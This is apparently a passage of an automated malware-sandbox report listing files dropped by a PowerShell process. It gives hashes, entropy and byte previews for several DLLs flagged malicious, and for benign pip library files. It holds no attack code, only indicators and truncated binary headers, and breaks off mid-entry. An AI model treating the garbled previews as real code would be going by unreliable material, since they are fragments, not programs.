                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........................................................K......K......Ki.....K.....Rich...........................PE..d...M..e.........." ...%.8...................................................0............`.....................................................d...............l............ ..4...................................@...@............P...............................text....7.......8.................. ..`.rdata..f....P.......<..............@..@.data...8...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):58368
                                                                                                                                                                                                              Entropy (8bit):4.276947153784193
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:98Uqho9weF5/eHkRnYcZiGKdZHDL7idErZ8ZYXGg:9gCneH//idv2
                                                                                                                                                                                                              MD5:BA5BA714AEBFD8130EB6E0983FBAE20B
                                                                                                                                                                                                              SHA1:3309C26A9083EC3AD982DD3D6630FCC16465F251
                                                                                                                                                                                                              SHA-256:861167DFEB390261E538D635EAD213E81C1166D8D85A496774FBF2EBFF5A4332
                                                                                                                                                                                                              SHA-512:309CC3FD8DB62517AE70B404C5ACD01052F10582A17123135CD1A28D3A74AB28F90A8E7ED7D2061A4B6C082F85E98DA822D43986FC99367B288A72BA9F8B5569
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........................................................K......K......Ki.....K.....Rich...........................PE..d...N..e.........." ...%.:...................................................0............`.................................................P...d............................ ..4...................................@...@............P...............................text...x9.......:.................. ..`.rdata.......P.......>..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10752
                                                                                                                                                                                                              Entropy (8bit):4.579354442149926
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:j0qVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EpmFWLOXDwoYPj15XkcX6gbW6z:pVddiT7pgTctEEI4qXDe11kcqgbW6
                                                                                                                                                                                                              MD5:1C74E15EC55BD8767968024D76705EFC
                                                                                                                                                                                                              SHA1:C590D1384D2207B3AF01A46A5B4F7A2AE6BCAD93
                                                                                                                                                                                                              SHA-256:0E3EC56A1F3C86BE1CAA503E5B89567AA91FD3D6DA5AD4E4DE4098F21270D86B
                                                                                                                                                                                                              SHA-512:E96CA56490FCE7E169CC0AB803975BAA8B5ACB8BBAB5047755AE2EEAE177CD4B852C0620CD77BCFBC81AD18BB749DEC65D243D1925288B628F155E8FACDC3540
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d...N..e.........." ...%............P........................................p............`.........................................p'......((..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):22016
                                                                                                                                                                                                              Entropy (8bit):6.143744403797058
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:7Uv5cRUtPQtjLJiKMjNrDF6pJgLa0Mp8Qy0gYP2lXCM:UKR8I+K0lDFQgLa1WzU
                                                                                                                                                                                                              MD5:E7826C066423284539BD1F1E99BA0CC6
                                                                                                                                                                                                              SHA1:DA7372EEB180C2E9A6662514A8FA6261E04AC6DC
                                                                                                                                                                                                              SHA-256:0E18B7C2686BB954A8EE310DD5FDB76D00AC078A12D883028BFFC336E8606DA2
                                                                                                                                                                                                              SHA-512:55F8B00B54F3C3E80803D5A3611D5301E29A2C6AF6E2CAA36249AEBA1D4FCC5A068875B34D65106C137F0455F11B20226B48EEF687F5EA73DFEA3C852BF07050
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...M..e.........." ...%.(...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text...X'.......(.................. ..`.rdata..T....@... ...,..............@..@.data...8....`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..4............T..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):17920
                                                                                                                                                                                                              Entropy (8bit):5.353670931504009
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:tPHNP3Mj7Be/yB/6sB3yxcb+IMcOYqQViCBD8Ng6Vf4A:DPcnB8KSsB34cb+bcOYpMCBDB
                                                                                                                                                                                                              MD5:D5DB7192A65D096433F5F3608E5AD922
                                                                                                                                                                                                              SHA1:22AD6B635226C8F6B94F85E4FBFB6F8C18B613C8
                                                                                                                                                                                                              SHA-256:FAB286E26160820167D427A4AAB14BE4C23883C543E2B0C353F931C89CEA3638
                                                                                                                                                                                                              SHA-512:5503E83D68D144A6D182DCC5E8401DD81C1C98B04B5ED24223C77D94B0D4F2DD1DD05AED94B9D619D30D2FE73DFFA6E710664FFC71B8FA53E735F968B718B1D9
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d...O..e.........." ...%.(... ......P.....................................................`..........................................I.......J..d....p.......`..................,....C...............................A..@............@...............................text....'.......(.................. ..`.rdata..8....@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):4.741875402338703
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:sCF/1nb2mhQtkgU7L9D0E7tfcqgYvEJPb:N2f6L9D5JxgYvEJj
                                                                                                                                                                                                              MD5:134F891DE4188C2428A2081E10E675F0
                                                                                                                                                                                                              SHA1:22CB9B0FA0D1028851B8D28DAFD988D25E94D2FD
                                                                                                                                                                                                              SHA-256:F326AA2A582B773F4DF796035EC9BF69EC1AD11897C7D0ECFAB970D33310D6BA
                                                                                                                                                                                                              SHA-512:43CE8AF33630FD907018C62F100BE502565BAD712AD452A327AE166BD305735799877E14BE7A46D243D834F3F884ABF6286088E30533050ED9CD05D23AACAEAB
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...O..e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):30
                                                                                                                                                                                                              Entropy (8bit):3.606238928653389
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:K2H1LLlAvnHv:Ku1LQ
                                                                                                                                                                                                              MD5:8B1D3A4A3D674CF9F227B7DCBE69552B
                                                                                                                                                                                                              SHA1:A55D1D416E674D9F4A8E0337DEFE350962F21F1A
                                                                                                                                                                                                              SHA-256:BE9B7E25E4D979F87C6BE142DB665E0525C555BB817174868882E141925A3694
                                                                                                                                                                                                              SHA-512:9E4B87724025EFBE758FB8FA370EB02274F2675D3C3C00713FF06C75B55F7005CFBE51195FD309073999C12AFB12E1BBCE5D3339D283C0602B739AEEC6307826
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Index interaction code.""".
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):249
                                                                                                                                                                                                              Entropy (8bit):5.08033602694552
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:LE/aCCps1I1L+36B0Wlte+u95/n23d6oAreKAnc6IaYleHXlll:YaCC8IY36BvPg/2ImbcjaYkH1ll
                                                                                                                                                                                                              MD5:BB8142E253E48326AF105ECBBC9A48E0
                                                                                                                                                                                                              SHA1:C446F1EFA9DA0DA28E035AFB49691581F42D3929
                                                                                                                                                                                                              SHA-256:B0399FCC61D00CB782EFB7D85016EDDF1446AFF93330D0BB4721B3731A002B77
                                                                                                                                                                                                              SHA-512:310D93A2150B7368B5A655E4F9857FD1D16839EF38BF4379EFE1988D316B39E8D7B64622950301031F6C25CB7D884253A4054C2B0A60DE524D76A99BBFC54E42
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e................................d.Z.y.).z.Index interaction code.N)...__doc__........pC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/index/__init__.py..<module>r........s..............r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):21900
                                                                                                                                                                                                              Entropy (8bit):5.378168250717723
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:okiT9pMiSSWWxWcZxEVuRglCex4kKVjm9y:okiT9hWWxWcZxEECQex4kKVX
                                                                                                                                                                                                              MD5:38E14668D781638E8D7658AAD17F4753
                                                                                                                                                                                                              SHA1:EF6813C46AF7438EBA255E8716AE2B64D0F9D9A1
                                                                                                                                                                                                              SHA-256:996925706F0D43FD3FCDD851370B45D4310C2598A515DF42EDF62E5605DF4A76
                                                                                                                                                                                                              SHA-512:68AE24633CBF6E874D9C32142A5EE7DFB1FFEF88327987DC93167F90BC70DC3856B3FB1F4BAF7C5B739013F11946035743A3FEF04C4A82D396799E13E3A2CFA6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e.@........................".....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!m"Z"..d.d.l#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/m0Z0..d.d.l1m2Z2..d.d.l3m4Z4m5Z5m6Z6..e.r.d.d.l.m7Z7..n.e8Z7..e.jr..................e:........Z;e.e<e<f.....Z=d.e<d.e.e<....f.d...Z>..G.d...d.e?........Z@d.e.d.d.f.d...ZA..G.d...d.e?........ZBd.e<d.e*d.d.f.d...ZCd.e<d.e*d.e.f.d...ZDd e=d.e.e<....f.d!..ZE..G.d"..d#........ZF..G.d$..d%e7........ZGd&eGd.eGf.d'..ZHeHd(d)d.e.e&....f.d*..........ZI..G.d+..d)........ZJ..G.d,..d-e.........ZK..d:d.e&d/e.e<e?f.....d0e.e.d1........d.d.f.d2..ZL..d;d.e.d3eMd.eJf.d4..ZNd.e&d.e*d.e.d)....f.d5..ZO..G.d6..d7e.........ZP..G.d8..d9........ZQy.)<zO.The main purpose of this module is to expose LinkCollector.collect_sources().......N)...HTMLParser)...Values)...TYPE_CHECKING..Callable..Dict..Iterable
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):40737
                                                                                                                                                                                                              Entropy (8bit):5.479427482696188
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:ocBbOYg3h24peYkFKbiTemX4ufoQwXMVmXANeeMrGOH:TBiZ3h24peP8biHIUHwXAmA5gGq
                                                                                                                                                                                                              MD5:7BA83B4B91CCD92EF1B147264FA08C0D
                                                                                                                                                                                                              SHA1:38A4DC7A6778318C4E57CBFDF97B806F30A4F995
                                                                                                                                                                                                              SHA-256:117AAED9286E06F67B589001E3DC1EC32D10F088DE51843F1FCA628AE0928537
                                                                                                                                                                                                              SHA-512:E2557ECC2F1F3D69D5962929452AC8FAF2847119C7A4D2339BCABA6BA259F093C459C0943C9F8CAFCFCDC8787F434C35C9D7FEB24142D8A87DAAA24B87F4AB70
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m Z ..d.d.l!m"Z"..d.d.l#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/m0Z0..d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:..d.d.l;m<Z<..d.d.l=m>Z>..e.r.d.d.l?m@Z@..g.d...ZA..e2eB........ZCe.e.d.....e.eDeEf.....f.....ZFe.eDeDeDe.e.eD....eFf.....ZG..d6d.e&d.e.eDeDeDf.....d.eHd eHf.d!..ZI..G.d"..d#e.j...........................ZK..G.d$..d%........ZLd&e.e"....d'e.e6....d(eEd e.e"....f.d)..ZM..G.d*..d+........ZN..G.d,..d-........ZO..G.d...d/........ZP..G.d0..d1........ZQd2eEd3eEd eDf.d4..ZRd2eEd3eEd e.eE....f.d5..ZSy.)7z!Routines related to PyPI, indexes.....N)...TYPE_CHECKING..FrozenSet..Iterable..List..Optional..Set..Tuple..Union)...specifiers)...Tag)...canonicalize_name)..._BaseVersion)...parse)...BestVersionAlreadyInstalled..Distri
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12621
                                                                                                                                                                                                              Entropy (8bit):5.263458214839483
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:9WPTo/v4rbEjyWoXqW4/t+n3cLw9/TJMjTxyyDfflr6U:yWv4rioXl4gr9/Tq5yyDlT
                                                                                                                                                                                                              MD5:3805FC414B157C1455F5798E83C7D0CE
                                                                                                                                                                                                              SHA1:02178953B88AF5315D2730385FB46D25CA5BA6FB
                                                                                                                                                                                                              SHA-256:68861FC4CC342330F96FE5815C5EE8776EAE7FA2A1CFB193314C2A4ED8113AD0
                                                                                                                                                                                                              SHA-512:EDEC89DD03C79981A52DB91EFD04C76ABD8C887050623E956B69E4D415265CCCBED8A1EA1FBF77380C4C951F220B7C57BC48B7F5CF53158A68EC61DB03C610B5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e.!..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.j8..................e.........Z.e.e.....Z.e.e.....Z e.e.g.e.e.....f.....Z!e.e.g.e"f.....Z#..G.d...d.........Z$d.e%d.e"f.d...Z&..G.d...d.........Z'..G.d...d.e$........Z(..G.d...d.e$........Z)..G.d...d.e$........Z*..G.d...d.e$........Z+d.e%d.e!d.e#d.e"d.e"d.e%d.e.e.e%....e.e$....f.....f.d...Z,y.)......N)...defaultdict)...Callable..Dict..Iterable..List..Optional..Tuple)...InvalidSdistFilename..InvalidVersion..InvalidWheelFilename..canonicalize_name..parse_sdist_filename..parse_wheel_filename)...InstallationCandidate)...Link)...path_to_url..url_to_path)...is_urlc.....................@.....e.Z.d.Z.e.d.e.e.....f.d...........Z.d.e.f.d...Z.d.e.f.d...Z.y.)...LinkSource..returnc...........................t...................).z,Returns the underlying link, if there's one.....NotImplementedError....s
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8688
                                                                                                                                                                                                              Entropy (8bit):4.5911644166334025
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:tMRN1Nf9Bc11X/9+E0AgO7yxtn1daV2yEsWWOFfet3Zhfi1dBzO4g0lFb0ev3K1o:wcT9+c7y/HZjF8hfIh9c8m4xkTC
                                                                                                                                                                                                              MD5:9F4F417D8C5299B25A4AFEC8D0C942DC
                                                                                                                                                                                                              SHA1:DC58845DC62CA823E3EA9E7DB6EA5D8B2FB7B4F3
                                                                                                                                                                                                              SHA-256:7497A0891F5FF3A92C95A00772FF7E4792FF5C17F94739BF164C8FB5E0EE3F12
                                                                                                                                                                                                              SHA-512:0344B7B8669C19802F91F92A5EBACB6B6EFACABFEB771B6E782D629D273BB6DD7A8BFF72B93B868BE44F7B31B148FFFDE75E2507B0E8EB2F7A22D4047878CB5D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import logging.import mimetypes.import os.from collections import defaultdict.from typing import Callable, Dict, Iterable, List, Optional, Tuple..from pip._vendor.packaging.utils import (. InvalidSdistFilename,. InvalidVersion,. InvalidWheelFilename,. canonicalize_name,. parse_sdist_filename,. parse_wheel_filename,.)..from pip._internal.models.candidate import InstallationCandidate.from pip._internal.models.link import Link.from pip._internal.utils.urls import path_to_url, url_to_path.from pip._internal.vcs import is_url..logger = logging.getLogger(__name__)..FoundCandidates = Iterable[InstallationCandidate].FoundLinks = Iterable[Link].CandidatesFromPage = Callable[[Link], Iterable[InstallationCandidate]].PageValidator = Callable[[Link], bool]...class LinkSource:. @property. def link(self) -> Optional[Link]:. """Returns the underlying link, if there's one.""". raise NotImplementedError().. def page_candidates(self) -> FoundCandidates:. ""
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15365
                                                                                                                                                                                                              Entropy (8bit):4.814507131821125
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:OdFSftlYe423JTFZAj5iC7SCrEYuGcrgoqa6DxbLCLax3GZIOkeFIqK2RrRlFRoB:OdFSllF4sMwZ9b7qa6DpGjrNRs
                                                                                                                                                                                                              MD5:42097813533BC9F4A543ED8749B0DC4D
                                                                                                                                                                                                              SHA1:A4A9AF510C13B0BB0DC6B2DDFA089D570409A749
                                                                                                                                                                                                              SHA-256:0E1F0B2561BC2D19432B82488FDB1F445F7A4D113313EF8DFC0225C7B4EAA1EE
                                                                                                                                                                                                              SHA-512:4FCBB5BB4E960E75D75ABFC8522767A40DFD7DEE606C74073D4DED92453A438635A7777981EE08E32C27E03A63C49AD9DCA74175D92A20C53CD81F7916206E8A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import functools.import logging.import os.import pathlib.import sys.import sysconfig.from typing import Any, Dict, Generator, Optional, Tuple..from pip._internal.models.scheme import SCHEME_KEYS, Scheme.from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.deprecation import deprecated.from pip._internal.utils.virtualenv import running_under_virtualenv..from . import _sysconfig.from .base import (. USER_CACHE_DIR,. get_major_minor_version,. get_src_prefix,. is_osx_framework,. site_packages,. user_site,.)..__all__ = [. "USER_CACHE_DIR",. "get_bin_prefix",. "get_bin_user",. "get_major_minor_version",. "get_platlib",. "get_purelib",. "get_scheme",. "get_src_prefix",. "site_packages",. "user_site",.]...logger = logging.getLogger(__name__)..._PLATLIBDIR: str = getattr(sys, "platlibdir", "lib").._USE_SYSCONFIG_DEFAULT = sys.version_info >= (3, 10)...def _should_use_sysconfig() -> bool:. """This function determines the value
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):16793
                                                                                                                                                                                                              Entropy (8bit):5.520420057675889
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:1ozXla4tbChc26p9eilj05jF3a7PDd+wven1Kt:1orw4/eilj65gBWn1Kt
                                                                                                                                                                                                              MD5:A9DDBAA96A9A4A0128142F63A00EB683
                                                                                                                                                                                                              SHA1:F93BE1BE74E443AF1445835B088350664C53E1F9
                                                                                                                                                                                                              SHA-256:6057791336C6D58152B0A46B0E46E615CC0E9AE1A2E3582D496F921F45BCD020
                                                                                                                                                                                                              SHA-512:06215181E6E5F7013EBE40EC1B81A2677D43CEDD4C28B049ED5B14041A6605E1358F1C73E9C4BB3CD7F2D72C4C0D260DA41C1883571E11794D7BA5C50B38AE14
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e.<........................r.....U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...g.d...Z...e.j>..................e ........Z!..e"e.d.d.........Z#e$e%d.<...e.jL..................d.k\..Z'd.e(f.d...Z)..e)........Z*e*s.d.d.l.m+Z+..e'r.e*s.e.jX..................Z-n.e.j\..................Z-d.e(f.d...Z/d.e.e$e$f.....d.e(f.d...Z0..e.jb..................d...........d.e(f.d...........Z2..e.jb..................d...........d.e(f.d...........Z3..e.jb..................d...........d.e(f.d...........Z4..e.jb..................d...........d.e(f.d...........Z5..e.jb..................d...........d.e(f.d...........Z6d.e.e$....d.e.e$d.d.f.....f.d...Z7..e.jb..................d...........d.e.jp..................d.e.jp..................d.e$d.d.f.d ..........Z9d.e.jp..................d.e.jp..................d.e$d.e(f.d!..Z:..e.jb..................d...........d"d.d.d.d#..d$e(d%
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6865
                                                                                                                                                                                                              Entropy (8bit):5.53065588397795
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:SA4mRlJske9uLhnTdMZa9dr4VVlgznaoix4F5dJEUlVzW:BhRrEOdrWhoBFJECa
                                                                                                                                                                                                              MD5:1C8E7F7FB7F25B720C22405A1D203F30
                                                                                                                                                                                                              SHA1:54E240041068C5F11D94CE9B9F91824CCFDBC978
                                                                                                                                                                                                              SHA-256:66962DF5CC810645AB34421CEA98728C0270313FF877169BCA5341ECC650A8A3
                                                                                                                                                                                                              SHA-512:AAA1136525D8E490DA918CEA17E6E8137F67A3B3EAED5DC533BF390C54736E43984F748F7800D127F54AF081E4876848EF3BEAD7078C707C1A31DEF3950CAEC1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.ey...............................d.Z.....e.d.........j.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j>..................e ........Z!..........d.d.d...d.e"d.e#d.e.e"....d.e.e"....d.e#d.e.e"....d.e#d.e.e"e"f.....f.d...Z$..........d.d.e"d.e#d.e.e"....d.e.e"....d.e#d.e.e"....d.e.f.d...Z%d.e"f.d...Z&d.e"f.d...Z'd.e"f.d...Z(y.#.e.e.f.$.r...Y...w.x.Y.w.).z7Locations where we look for configs, install stuff, etc.._distutils_hack.....N)...Command)...SCHEME_KEYS)...install....get_python_lib)...Dict..List..Optional..Union..cast)...Scheme)...WINDOWS)...running_under_virtualenv.....)...get_major_minor_versionF)...ignore_config_files..dist_name..user..home..root..isolated..prefixr......returnc..........................d.d.l.m.}...d.|.i.}.|.r.d.g.|.d.<.....|.|.........}.|.s...|.j.............................d.}.|.j...................d.d...........}.|...J..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8028
                                                                                                                                                                                                              Entropy (8bit):5.493945819392106
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:LXaHI7MYoLOb/Gp0TgBoKTZikflZ1WVnrJTLAUUZLmO/JMRg5nHNQNRSiEkEuASh:Lq7cP07iopWJrZLAUUZLTNWruLwfSs
                                                                                                                                                                                                              MD5:473C3D6F75B0A68761D496F44D2ACCE4
                                                                                                                                                                                                              SHA1:398D7ADD187E87120724971B1793FA14DD312E8C
                                                                                                                                                                                                              SHA-256:907A4441D1B433DCC11AEF9F4277F00F6A0744DF402B401F00CC457FD00331B9
                                                                                                                                                                                                              SHA-512:B2F187897ACB3BFE8215559A712A153E865993627A96D1618377457807F6E1B7D3533F023CFE44A4DE04617D41541C47C7004ED105AB63A3B260785FD6F72D4C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.....e.j"..................e.........Z...e...e.j*..................................Z...e.e.d.d.........Z.d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.g.d...Z...e.j@..................d...........e.jC..................d.....................d.d.e.d.e.d.e.jD..................e.....d.e.jD..................e.....d.e.d.e.jD..................e.....d.e.f.d...Z#d.e.f.d...Z$d.e.f.d...Z%d.e.f.d...Z&y.)......N)...InvalidSchemeCombination..UserInstallationInvalid)...SCHEME_KEYS..Scheme)...running_under_virtualenv.....)...change_root..get_major_minor_version..is_osx_framework..get_preferred_scheme..returnc.....................D.....d.t.........v.x.r...t...................x.r...t.................S.).a....Check for Apple's ``osx_framework_library`` scheme... Python distributed by Apple's Command Line Tools has this special scheme. that's used when:..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3798
                                                                                                                                                                                                              Entropy (8bit):5.234555586030324
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:ZTiLYMKBXGjWf/H2CtblRlZlpF3ajAR7CTJ3y1/zR5Pe1baYXDDmC5OMi:5jM6XGjeJVliM2T1ypeUsH5OMi
                                                                                                                                                                                                              MD5:083BC1C65EB97C0BC226F7395EB44634
                                                                                                                                                                                                              SHA1:264DE7529AD17164F85F8B7B301A1F28716AAA8E
                                                                                                                                                                                                              SHA-256:88BEA597737E6284FCADAABA4AE64EB468D70819EE71BEE6717A5658A515293A
